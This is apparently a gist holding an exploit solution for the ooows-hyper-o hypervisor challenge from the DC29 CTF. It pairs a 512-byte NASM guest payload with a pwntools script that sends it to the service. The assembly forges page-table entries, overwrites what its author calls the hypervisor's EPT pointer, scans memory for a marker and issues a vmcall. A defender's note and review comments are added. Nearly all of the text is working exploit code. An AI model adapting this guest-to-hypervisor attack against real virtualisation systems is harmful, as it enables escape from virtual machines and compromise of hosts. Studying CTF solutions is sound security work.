elnx/sc.asm Secret

Last active Aug 15, 2021
Solution to the ooows-hyper-o challenge in DC29 CTF.
; nasm -fbin sc.asm -o sc
; some code from https://github.com/gamozolabs/chocolate_milk
;
; Guest-side payload for the ooows-hyper-o challenge, assembled as a flat
; 512-byte image in boot-sector layout (padded to 0x1fe bytes, then
; 0x55 0xaa). Flow: 16-bit entry -> copy self to DS:0xf000 -> load GDT ->
; enter 32-bit protected mode -> write a chain of table entries below
; 0x4000 -> scan candidate addresses until a marker is seen -> vmcall.
; The exact meaning of the table entries and of the vmcall arguments is
; defined by the challenge hypervisor and cannot be verified from this file.
;
; Defender's note: the author's own comment ("hijack eptp") says the write
; at 0x200000 is meant to replace the hypervisor's second-level translation
; pointer. A hypervisor must never take such control structures from memory
; the guest can write; every value here is guest-controlled.
[org 0xf000]                ; image is linked to run at linear 0xf000
[bits 16]
entry:
; Disable interrupts and clear direction flag
cli
cld
; Copy 0x1000 bytes from CS:0xf000 to DS:0xf000 (the image itself is only
; 512 bytes, the copy is deliberately larger).
; NOTE(review): DS has not been set yet, so where the copy lands depends on
; the value DS holds on entry -- presumably 0, so the image ends up at
; linear 0xf000 where `org` expects it. Confirm against the loader.
mov ecx, 0x1000
mov edx, 0xf000
self_copy:
mov al, [cs:edx]
mov [ds:edx], al
inc edx
loop self_copy              ; in 16-bit code `loop` counts down cx; 0x1000 fits
; Set the A20 line
; in al, 0x92
; or al, 2
; out 0x92, al
; Clear DS
xor ax, ax
mov ds, ax
; Load a 32-bit GDT
; [gdt] is an absolute offset under `org 0xf000`, read through DS = 0.
lgdt [gdt]
; Enable protected mode
mov eax, cr0
or eax, (1 << 0)            ; CR0.PE
mov cr0, eax
; Transition to 32-bit mode by setting CS to a protected mode selector
jmp 0x0018:pm_entry         ; 0x18 = 32-bit code descriptor, base 0 (see gdt_base)
[bits 32]
pm_entry:
; Set up all data selectors
mov ax, 0x20                ; 0x20 = 32-bit data descriptor, base 0, 4 GB limit
mov es, ax
mov ds, ax
mov fs, ax
mov gs, ax
mov ss, ax
mov esp, 0x8000             ; stack top; the slot written below for 0x8000 is labelled "stack"
; Chain of tables 0 -> 0x1000 -> 0x2000 -> 0x3000. Each dword written is
; 0x3d000000 + <address of next table> + low flag bits. Only the low dword
; of each 8-byte slot is written; the high dword is whatever memory already
; held. Which translation structure the hypervisor reads these as is not
; visible from this file.
mov dword [0], 0x3d000000+0x1000+7          ; -> table at 0x1000
mov dword [0+0x1000], 0x3d000000+0x2000+7   ; -> table at 0x2000
mov dword [0+0x2000], 0x3d000000+0x3000+7   ; -> table at 0x3000
; Leaf slots in the table at 0x3000 (index * 8), flag bits 0x477. The
; author's labels suggest slot n covers address 0xn000.
; code
mov dword [0+0x3000+0xff*8], 0x3d000000+0xff000+0x477
mov dword [0+0x3000+0xf*8], 0x3d000000+0xf000+0x477   ; this image (org 0xf000)
; stack
mov dword [0+0x3000+8*8], 0x3d000000+0x8000+0x477     ; esp was set to 0x8000 above
; pde
mov dword [0+0x3000+3*8], 0x3d000000+0x3000+0x477     ; the table maps itself
; hijack eptp
; Author's comment says this replaces the hypervisor's EPT pointer; the
; location 0x200000 and value 0x3d00005e are challenge-specific.
mov dword [0x200000], 0x3d00005e
; CPUID unconditionally exits to the hypervisor under VMX; its result is
; unused here, so it is presumably executed only to force that exit.
cpuid
; Scan: write a candidate entry into slot 4 of the table at 0x3000, force
; an exit with CPUID, then check whether the dword now readable at 0x4000
; (slot 4 by the pattern above) has low bytes 0x30 0x30 0x30 (ASCII "000").
; Candidates start at 0x10000 and step by 0x10000 up to (not including)
; 0x40000000; the 0x477 flag bits are OR'd in once and survive the
; additions because 0x10000 does not touch the low 12 bits.
mov edi, 0x10000
or edi, 0x477
; NOTE(review): the label name `loop` is also the mnemonic used at
; self_copy above; a distinct name (e.g. scan) would read better.
loop:
mov dword [0+0x3000+4*8], edi
cpuid
mov eax, [0x4000]
and eax, 0xffffff           ; keep the three low bytes (little-endian: 0x4000..0x4002)
cmp eax, 0x303030
je found
add edi, 0x10000
cmp edi, 0x40000000+0x477
jae fail                    ; unsigned compare on an address -- correct family
jmp loop
found:
; The six dwords at 0x4000..0x4014 become the hypercall arguments; their
; meaning is defined by the challenge hypervisor.
mov eax, [0x4000]
mov ebx, [0x4000+4]
mov ecx, [0x4000+4*2]
mov edx, [0x4000+4*3]
mov esi, [0x4000+4*4]
mov edi, [0x4000+4*5]
vmcall
fail:
; Interrupts are still disabled (cli above, never re-enabled), so hlt
; parks the CPU for good. vmcall also falls through here if it returns.
hlt
align 8
gdt_base:
dq 0x0000000000000000 ; 0x0000 | Null descriptor
dq 0x00009a007c00ffff ; 0x0008 | 16-bit, present, code, base 0x7c00
dq 0x000092000000ffff ; 0x0010 | 16-bit, present, data, base 0
dq 0x00cf9a000000ffff ; 0x0018 | 32-bit, present, code, base 0
dq 0x00cf92000000ffff ; 0x0020 | 32-bit, present, data, base 0
dq 0x00209a0000000000 ; 0x0028 | 64-bit, present, code, base 0 (unused here)
dq 0x0000920000000000 ; 0x0030 | 64-bit, present, data, base 0 (unused here)
gdt:
; lgdt pseudo-descriptor: 16-bit limit (size - 1), then 32-bit linear base.
dw (gdt - gdt_base) - 1
dd gdt_base
; Pad to 510 bytes and append the 0x55 0xaa boot-sector signature.
times 0x1fe - ($ - $$) db 0
db 0x55, 0xaa
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os
import sys
# Verbosity of the pwntools logger for this run.
context.log_level = 'info'
def exploit(r):
    """Send the assembled payload image to the challenge over ``r``.

    Waits for the banner fragment the service prints, then sends the
    bytes of ``sc.o`` with a 0x16 byte (ASCII SYN) placed before every
    payload byte, and finally hands the connection to the user.  The
    reason for that framing is not documented on this page.

    Args:
        r: a pwntools tube (``remote`` or ``process``) connected to the
           challenge.
    """
    # NOTE(review): the assembly header says `nasm -fbin sc.asm -o sc`,
    # yet this reads `sc.o` -- one of the two names is stale; confirm.
    r.recvuntil('#mmm" #mmmmm')
    image = read('sc.o')
    # Python-2 style: iterating a str yields 1-char strings.  Under
    # Python 3 read() returns bytes, iteration yields ints, and the
    # concatenation below raises TypeError -- the bare `python` shebang
    # leaves the intended interpreter unstated; confirm.
    framed = ''.join('\x16' + ch for ch in image)
    r.sendline(framed)
    r.interactive()
if __name__ == '__main__':
    # Usage: script HOST PORT  -> connect remotely;
    #        script BINARY     -> spawn ./BINARY locally.
    if len(sys.argv) > 2:
        r = remote(sys.argv[1], int(sys.argv[2]))
    else:
        r = process('./%s' % (sys.argv[1]))
    exploit(r)